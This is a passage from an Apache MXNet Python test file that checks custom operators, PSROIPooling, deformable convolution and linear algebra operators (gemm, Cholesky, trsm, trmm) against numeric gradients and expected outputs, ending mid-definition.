x = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.cast(data, dtype='float64')
op = mx.symbol.cast(op, dtype='float32')
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.Variable('data', stype='csr')
aux = mx.symbol.Variable('aux')
op2 = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = x.tostype('csr')
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op2, [x], [aux], grad_stype_dict={"data": "csr"})
x2 = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
x2 = x2.tostype('csr')
aux2 = mx.nd.zeros_like(x2)
x2.attach_grad()
with mx.autograd.record():
output = mx.nd.Custom(x2, aux2, name='sqr', op_type='sqr')
output.backward()
expected_output = mx.nd.sparse.square(x2)
expected_grad = 2 * x2
rtol = 1e-4
atol = 1e-6
assert_almost_equal(output, expected_output, rtol=rtol, atol=atol)
assert_almost_equal(x2.grad, expected_grad, rtol=rtol, atol=atol)
# test for backward compatibility, i.e. the correctness of default implementation of
# infer storage in custom operator
class Mult(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult")
class MultProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return Mult()
lhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
rhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
lhs.attach_grad()
rhs.attach_grad()
with mx.autograd.record():
y = mx.nd.Custom(lhs, rhs, name='mult', op_type='mult')
y.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class MultNoGrad(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult_no_grad")
class MultNoGradProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultNoGradProp, self).__init__(need_top_grad=False)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return MultNoGrad()
def infer_storage_type_backward(self, ograd_stype, in_stype, out_stype, igrad_stype, aux_stype):
return ograd_stype, in_stype, out_stype, igrad_stype, aux_stype
with mx.autograd.record():
y2 = mx.nd.Custom(lhs, rhs, name="mult_no_grad", op_type="mult_no_grad")
y2.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class NoInputOp(mx.operator.CustomOp):
def __init__(self, length, depth):
super(NoInputOp, self).__init__()
self.output = np.ones(shape=(length, depth), dtype=np.float32)
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], self.output)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register("no_input_op")
class NoInputOpProp(mx.operator.CustomOpProp):
def __init__(self, length, depth):
super(NoInputOpProp, self).__init__()
self.length = int(length)
self.depth = int(depth)
def list_arguments(self):
return []
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return [], [(self.length, self.depth)], []
def infer_type(self, in_type):
return [], [np.float32], []
def create_operator(self, ctx, shapes, dtypes):
return NoInputOp(length=self.length, depth=self.depth)
with mx.autograd.record():
x = mx.nd.Custom(length=10, depth=10, op_type="no_input_op")
assert_almost_equal(x, np.ones(shape=(10, 10), dtype=np.float32))
@pytest.mark.skip(reason="Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/17467")
def test_custom_op_fork():
# test custom operator fork
# see https://github.com/apache/incubator-mxnet/issues/14396
class AdditionOP(mx.operator.CustomOp):
def __init__(self):
super(AdditionOP, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
out_data[0][:] = in_data[0] + in_data[1]
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
in_grad[0][:] = out_grad[0]
in_grad[1][:] = out_grad[0]
@mx.operator.register("AdditionOP")
class AdditionOPProp(mx.operator.CustomOpProp):
def __init__(self):
super(AdditionOPProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]]
def create_operator(self, ctx, shapes, dtypes):
return AdditionOP()
if not sys.platform.startswith('win'): # no fork in windows
def custom_add():
a = mx.nd.array([1, 2, 3])
b = mx.nd.array([4, 5, 6])
c = mx.nd.Custom(a, b, op_type='AdditionOP')
assert_almost_equal((a + b).asnumpy(), c.asnumpy())
custom_add()
from multiprocessing import Process
p = Process(target=custom_add)
p.daemon = True
p.start()
p.join(5)
assert not p.is_alive() and p.exitcode == 0
def _build_dot_custom(fun_forward, name):
class Dot(mx.operator.CustomOp):
def __init__(self):
super(Dot, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
fun_forward(in_data, out_data)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register(name)
class DotProp(mx.operator.CustomOpProp):
def __init__(self):
super(DotProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [(in_shape[0][0], in_shape[1][1])]
def create_operator(self, ctx, shapes, dtypes):
return Dot()
def test_custom_op_exc():
# test except handling
# see https://github.com/apache/incubator-mxnet/pull/14693
# 1. error in python code
def custom_exc1():
def f(in_data, out_data):
assert False
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot1')
a = mx.nd.zeros((4, 1))
b = mx.nd.zeros((1, 4))
c = mx.nd.Custom(a, b, op_type='Dot1')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc1)
# 2. error in pushing operator to engine
def custom_exc2():
def f(in_data, out_data):
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot2')
a = mx.nd.zeros((4, 2))
b = mx.nd.zeros((1, 4))
# trigger error by invalid input shapes of operands
c = mx.nd.Custom(a, b, op_type='Dot2')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc2)
# 3. error in real execution
if default_context().device_type == 'cpu':
def custom_exc3():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
out_data[0].wait_to_read()
_build_dot_custom(f, 'Dot3')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot3')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc3)
def custom_exc4():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
_build_dot_custom(f, 'Dot4')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot4')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc4)
def test_psroipooling():
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([168, 224], [168, 224]):
for grad_nodes in [['im_data']]:
spatial_scale = 0.0625
                    feat_height = int(image_height * spatial_scale)
                    feat_width = int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1))
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1))
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
op = mx.sym.contrib.PSROIPooling(data=im_data_var, rois=rois_data_var, spatial_scale=spatial_scale,
group_size=num_group, pooled_size=num_group,
output_dim=num_classes, name='test_op')
rtol, atol = 1e-2, 1e-3
check_numeric_gradient(op, [im_data, rois_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes)
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@pytest.mark.parametrize('num_batch', [1, 2])
@pytest.mark.parametrize('num_channel_data_deformable_group', itertools.product([4, 8], [1, 2]))
@pytest.mark.parametrize('input_height_width', itertools.product([5, 6], [5, 6]))
@pytest.mark.parametrize('dilate', [(1, 1), (2, 2)])
@pytest.mark.parametrize('grad_nodes', [['im_data'], ['offset_data'], ['weight']])
def test_deformable_convolution(num_batch, num_channel_data_deformable_group, input_height_width,
dilate, grad_nodes):
num_channel_data, num_deformable_group = num_channel_data_deformable_group
input_height, input_width = input_height_width
output_height = input_height
output_width = input_width
im_data = np.random.rand(num_batch, num_channel_data, input_height, input_width)
offset_data = \
np.random.rand(num_batch, num_deformable_group * 3 * 3 * 2, output_height, output_width)\
* 0.8 + 0.1
weight = np.random.normal(0, 0.001, (num_channel_data, num_channel_data, 3, 3))
bias = np.zeros(num_channel_data)
im_data_var = mx.symbol.Variable(name="im_data").as_np_ndarray()
offset_data_var = mx.symbol.Variable(name="offset_data").as_np_ndarray()
weight_var = mx.symbol.Variable(name="weight").as_np_ndarray()
bias_var = mx.symbol.Variable(name="bias").as_np_ndarray()
op = mx.sym.npx.deformable_convolution(name='test_op', data=im_data_var,
offset=offset_data_var,
weight=weight_var, bias=bias_var,
num_filter=num_channel_data, pad=dilate,
kernel=(3, 3), stride=(1, 1), dilate=dilate,
num_deformable_group=num_deformable_group)
if grad_nodes[0] == 'offset_data':
# wider tolerance needed for coordinate differential
rtol, atol = 1.0, 1e-2
else:
rtol, atol = 0.05, 1e-3
    # For now we only have a GPU implementation
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, offset_data, weight, bias], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0), numeric_eps=1.0/64)
def _validate_sample_location(input_rois, input_offset, spatial_scale, pooled_w, pooled_h, sample_per_part, part_size, output_dim, num_classes, trans_std, feat_h, feat_w):
num_rois = input_rois.shape[0]
output_offset = input_offset.copy()
# simulate deformable psroipooling forward function
for roi_idx in range(num_rois):
sub_rois = input_rois[roi_idx, :].astype(np.float32)
img_idx, x0, y0, x1, y1 = int(sub_rois[0]), sub_rois[1], sub_rois[2], sub_rois[3], sub_rois[4]
roi_start_w = round(x0) * spatial_scale - 0.5
roi_start_h = round(y0) * spatial_scale - 0.5
roi_end_w = round(x1 + 1) * spatial_scale - 0.5
roi_end_h = round(y1 + 1) * spatial_scale - 0.5
roi_w, roi_h = roi_end_w - roi_start_w, roi_end_h - roi_start_h
bin_size_w, bin_size_h = roi_w / pooled_w, roi_h / pooled_h
sub_bin_size_w, sub_bin_size_h = bin_size_w / sample_per_part, bin_size_h / sample_per_part
for c_top in range(output_dim):
channel_each_cls = output_dim / num_classes
class_id = int(c_top / channel_each_cls)
for ph in range(pooled_h):
for pw in range(pooled_w):
part_h = int(math.floor(float(ph) / pooled_h * part_size))
part_w = int(math.floor(float(pw) / pooled_w * part_size))
trans_x = input_offset[roi_idx, class_id * 2, part_h, part_w] * trans_std
trans_y = input_offset[roi_idx, class_id * 2 + 1, part_h, part_w] * trans_std
bin_h_start, bin_w_start = ph * bin_size_h + roi_start_h, pw * bin_size_w + roi_start_w
need_check = True
while need_check:
pass_check = True
for ih in range(sample_per_part):
for iw in range(sample_per_part):
h = bin_h_start + trans_y * roi_h + ih * sub_bin_size_h
w = bin_w_start + trans_x * roi_w + iw * sub_bin_size_w
if w < -0.5 or w > feat_w - 0.5 or h < -0.5 or h > feat_h - 0.5:
continue
w = min(max(w, 0.1), feat_w - 1.1)
h = min(max(h, 0.1), feat_h - 1.1)
                                # if the following condition holds, the sampling location is not differentiable,
                                # therefore we need to redo the sampling process
if h - math.floor(h) < 1e-3 or math.ceil(h) - h < 1e-3 or w - math.floor(w) < 1e-3 or math.ceil(w) - w < 1e-3:
trans_x, trans_y = random.random() * trans_std, random.random() * trans_std
pass_check = False
break
if not pass_check:
break
if pass_check:
output_offset[roi_idx, class_id * 2 + 1, part_h, part_w] = trans_y / trans_std
output_offset[roi_idx, class_id * 2, part_h, part_w] = trans_x / trans_std
need_check = False
return output_offset
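# The guard above re-draws the offsets whenever a sampling coordinate lands within
# 1e-3 of an integer grid point, where the bilinear interpolation kernel has a kink
# and is not differentiable with respect to the coordinate. A minimal sketch of that
# check, assuming the same 1e-3 tolerance (illustrative only, not used by the tests):
def _is_near_integer_sketch(v, eps=1e-3):
    # True if v is within eps of an integer grid point, i.e. a numeric gradient
    # evaluated at v would straddle the kink of the bilinear kernel
    return (v - math.floor(v) < eps) or (math.ceil(v) - v < eps)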
@pytest.mark.skip(reason="Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/11713")
def test_deformable_psroipooling():
sample_per_part = 4
trans_std = 0.1
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([160, 224], [160, 224]):
for grad_nodes in [['im_data'], ['offset_data']]:
spatial_scale = 0.0625
stride = int(1 / spatial_scale)
                    feat_height = int(image_height * spatial_scale)
                    feat_width = int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1 - 2 * stride)) + stride
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1 - 2 * stride)) + stride
offset_data = np.random.rand(num_rois, 2*num_classes, num_group, num_group)
                    # at certain points the bilinear interpolation function may be non-differentiable;
                    # to avoid this, we check that the sampling locations fall on valid (differentiable) points
offset_data = _validate_sample_location(rois_data, offset_data, spatial_scale, num_group, num_group,
sample_per_part, num_group, num_classes, num_classes, trans_std, feat_height, feat_width)
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
op = mx.sym.contrib.DeformablePSROIPooling(data=im_data_var, rois=rois_data_var,
trans=offset_data_var, spatial_scale=spatial_scale,
sample_per_part=4, group_size=num_group,
pooled_size=num_group, output_dim=num_classes,
trans_std=0.1, no_trans=False, name='test_op')
rtol, atol = 1e-2, 1e-3
                    # For now we only have a GPU implementation
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, rois_data, offset_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _gemm_test_helper(dtype, grad_check, rtol_fw = None, atol_fw = None,
rtol_bw = None, atol_bw = None, num_eps = None):
def np_random_data(shape, dtype=np.float32):
return np.random.uniform(low=-0.5,
high=0.5, size=shape).astype(dtype)
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
data3 = mx.symbol.Variable('data3')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
shape1 = (2, 3)
shape2 = (3, 2)
shape3 = (3, 3)
shape4 = (2, 2)
data_in1 = np_random_data(shape1, dtype)
data_in2 = np_random_data(shape2, dtype)
data_in3 = np_random_data(shape3, dtype)
data_in4 = np_random_data(shape4, dtype)
# Check all transpositions of gemm operator.
data_in1_t = np.transpose(data_in1)
data_in2_t = np.transpose(data_in2)
res_gemm = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [data_in1, data_in2, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in4])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True, transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in3])
res_gemm = 4. * np.dot(data_in1_t, data_in1) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in3])
res_gemm = 4. * np.dot(data_in1, data_in1_t) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in4])
# Check batch of gemm.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
c = rep_3x(data_in4, 2, 2)
r = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
r = rep_3x(r, 2, 2)
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [a, b, c], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b, c])
# Check for different axis that describes matrix rows.
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
c2 = np.copy(np.swapaxes(c, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = 0)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
c2 = np.copy(np.swapaxes(c, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = -3)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
# Check gemm2 operator same way as gemm.
res_gemm = 4. * np.dot(data_in1, data_in2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in1)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
res_gemm = 4. * np.dot(data_in1, data_in1_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
# Check batch of gemm2.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
r = rep_3x(4. * np.dot(data_in1, data_in2), 2, 2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [a, b], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b])
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = 0)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = -3)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
# Test gemm separately from other la-operators.
def test_gemm():
_gemm_test_helper(np.float64, True)
with environment('MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION', '0'):
_gemm_test_helper(np.float32, True)
if default_context().device_type == 'gpu':
with environment('MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION', '1'):
_gemm_test_helper(np.float32, True)
# Helper functions for test_laop
def _make_symm_symbol(a, ndims):
assert ndims >= 2
tr_shape = list(range(ndims))
tr_shape[-1] = ndims-2
tr_shape[-2] = ndims-1
tr_shape = tuple(tr_shape)
return 0.5 * (a + mx.sym.transpose(a, axes=tr_shape))
def _make_triangle_symm(a, ndims, m, lower, dtype=np.float32):
assert ndims >= 2
# The last two dimensions must both be m
# Create mask for lower triangle and diagonal
index = mx.sym.arange(start=0, stop=m, step=1, dtype=np.int32)
lt_mask = mx.sym.one_hot(index, depth=m, dtype=dtype)
for j in range(1, m):
part1 = mx.sym.zeros(shape=(j, m), dtype=dtype)
index = mx.sym.arange(start=0, stop=m-j, step=1, dtype=np.int32)
part2 = mx.sym.one_hot(index, depth=m, dtype=dtype)
lt_mask = lt_mask + mx.sym.concat(*[part1, part2], dim=0)
if not lower:
lt_mask = mx.sym.reshape(lt_mask, shape=(m, m))
lt_mask = mx.sym.transpose(lt_mask, axes=(1, 0))
shp = tuple([1]*(ndims-2) + [m, m])
lt_mask = mx.sym.reshape(lt_mask, shape=shp)
return mx.sym.broadcast_mul(a, lt_mask)
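# _make_triangle_symm builds, row by row via one_hot, the same mask that numpy would
# produce with np.tril. A minimal numpy sketch of the intended mask for m=3, assuming
# lower=True (illustrative only):
#
#   >>> np.tril(np.ones((3, 3)))
#   array([[1., 0., 0.],
#          [1., 1., 0.],
#          [1., 1., 1.]])
#
# For lower=False the mask is transposed, matching the branch above.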
# @ankkhedia: Getting rid of fixed seed as flakiness could not be reproduced
# tracked at https://github.com/apache/incubator-mxnet/issues/11718
@xfail_when_nonstandard_decimal_separator
def test_laop():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 2e-6
rtol_bw = 1e-5
atol_bw = 1e-5
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
def check_fw_grad(sym, location, expected):
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
if grad_check == 1:
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
matrix = np.array([[9., 3., -6., 12.],
[3., 26., -7., -11.],
[-6., -7., 9., 7.],
[12., -11., 7., 65.]])
trian = np.array([[3., 0., 0., 0.],
[1., 5., 0., 0.],
[-2., -1., 2., 0.],
[4., -3., 6., 2.]])
pow = np.array([[2., 1., 1., 1.],
[1., 4., 1., 1.],
[1., 1., 8., 1.],
[1., 1., 1., 16.]])
inv = np.array([[8.95/3., 0.05/3., 2.65, -2.5/3.],
[0.05/3., 0.05, 0.05, 0.],
[2.65, 0.05, 2.5, -0.75],
[-2.5/3., 0., -0.75, 0.25]])
ident = np.eye(4)
shape = (4, 4, 1, 1)
ones = mx.nd.ones(shape).asnumpy()
for lower in [True, False]:
upper = not lower
# Tests with trivial 1x1 matrices.
data_in = np.random.uniform(1, 10, shape)
# test potrf
        # Note: the input has to be symmetrized for the gradient test to work
res_potrf = np.sqrt(data_in)
test_potrf = mx.sym.linalg.potrf(data1, lower=lower)
check_fw_grad(test_potrf, [data_in], [res_potrf])
# test potri
res_potri = np.divide(ones, data_in * data_in)
test_potri = mx.sym.linalg.potri(data1, lower=lower)
check_fw_grad(test_potri, [data_in], [res_potri])
# test trsm
trian_in = data_in * 7.
test_trsm = mx.sym.linalg.trsm(data1, data2, alpha=7., lower=lower)
check_fw_grad(test_trsm, [trian_in, data_in], [ones])
# test trmm
trian_in = np.divide(ones, trian_in)
test_trmm = mx.sym.linalg.trmm(data1, data2, alpha=7., transpose=True,
rightside=True, lower=lower)
check_fw_grad(test_trmm, [trian_in, data_in], [ones])
# test sumlogdiag
res_sumlogdiag = np.reshape(np.log(data_in), (4, 4))
test_sumlogdiag = mx.sym.linalg.sumlogdiag(data1)
check_fw_grad(test_sumlogdiag, [data_in], [res_sumlogdiag])
# more elaborate example of Cholesky factorization
low_trian = trian
if upper:
trian = np.transpose(trian)
# test potrf
test_potrf = mx.sym.linalg.potrf(_make_symm_symbol(data1, ndims=4), lower=lower)
a = rep_3x(matrix, 4, 4)
r = rep_3x(trian, 4, 4)
check_fw_grad(test_potrf, [a], [r])
        # test potri
data1_ltri = _make_triangle_symm(
data1, ndims=4, m=4, lower=lower, dtype=dtype)
test_potri = mx.sym.linalg.potri(data1_ltri, lower=lower)
a = rep_3x(trian, 4, 4)
r = rep_3x(inv, 4, 4)
check_fw_grad(test_potri, [a], [r])
# test trsm
test_trsm = mx.sym.linalg.trsm(data1_ltri, data2, alpha=7., transpose=upper, lower=lower)
b = rep_3x(matrix, 4, 4)
r = rep_3x(7. * np.transpose(low_trian), 4, 4)
check_fw_grad(test_trsm, [a, b], [r])
test_trsm2 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-2., rightside=True, transpose=lower, lower=lower)
r = rep_3x(-2. * low_trian, 4, 4)
check_fw_grad(test_trsm2, [a, b], [r])
test_trsm3 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=0.5, transpose=lower, lower=lower)
b = rep_3x(np.transpose(low_trian), 4, 4)
r = rep_3x(0.5 * ident, 4, 4)
check_fw_grad(test_trsm3, [a, b], [r])
test_trsm4 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-0.5, rightside=True, transpose=upper, lower=lower)
b = rep_3x(low_trian, 4, 4)
r = rep_3x(-0.5 * ident, 4, 4)
check_fw_grad(test_trsm4, [a, b], [r])
# test trmm
test_trmm = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=7., transpose=True, rightside=True, lower=lower)
a = [a, rep_3x(matrix, 4, 4)]
r = rep_3x(7. * np.dot(matrix, trian.T), 4, 4)
check_fw_grad(test_trmm, a, [r])
test_trmm2 = mx.sym.linalg.trmm(data1_ltri, data2, alpha=-2., lower=lower)
r = rep_3x(-2. * np.dot(trian, matrix), 4, 4)
check_fw_grad(test_trmm2, a, [r])
test_trmm3 = mx.sym.linalg.trmm(data1_ltri, data2, rightside=True, lower=lower)
r = rep_3x(np.dot(matrix, trian), 4, 4)
check_fw_grad(test_trmm3, a, [r])
test_trmm4 = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=1.2, transpose=True, lower=lower)
r = rep_3x(1.2 * np.dot(trian.T, matrix), 4, 4)
check_fw_grad(test_trmm4, a, [r])
# test sumlogdiag
r = np.reshape(np.tile(10. * np.log(np.array([2.])), 3), (3,))
check_fw_grad(test_sumlogdiag, [rep_3x(pow, 4, 4)], [r])
# Tests for operators linalg.syrk, linalg.gelqf
def _gelqf_combined_symbol(a):
q, l = mx.sym.linalg.gelqf(a)
q_qt = mx.sym.linalg.syrk(q, transpose=False, alpha=1., name='Q_times_Qt')
l_q = mx.sym.linalg.trmm(l, q, alpha=1., name='L_times_Q')
return mx.sym.Group([q_qt, l_q])
# NOTE: If we leave the unused output dangling, things break for dtype=np.float64:
# the backward gradient for the unused output then has dtype np.float32, which is
# very annoying.
def _gelqf_first_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(l), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(q, bogus_scal)
def _gelqf_second_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(q), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(l, bogus_scal)
def _syevd_combined_symbol(a):
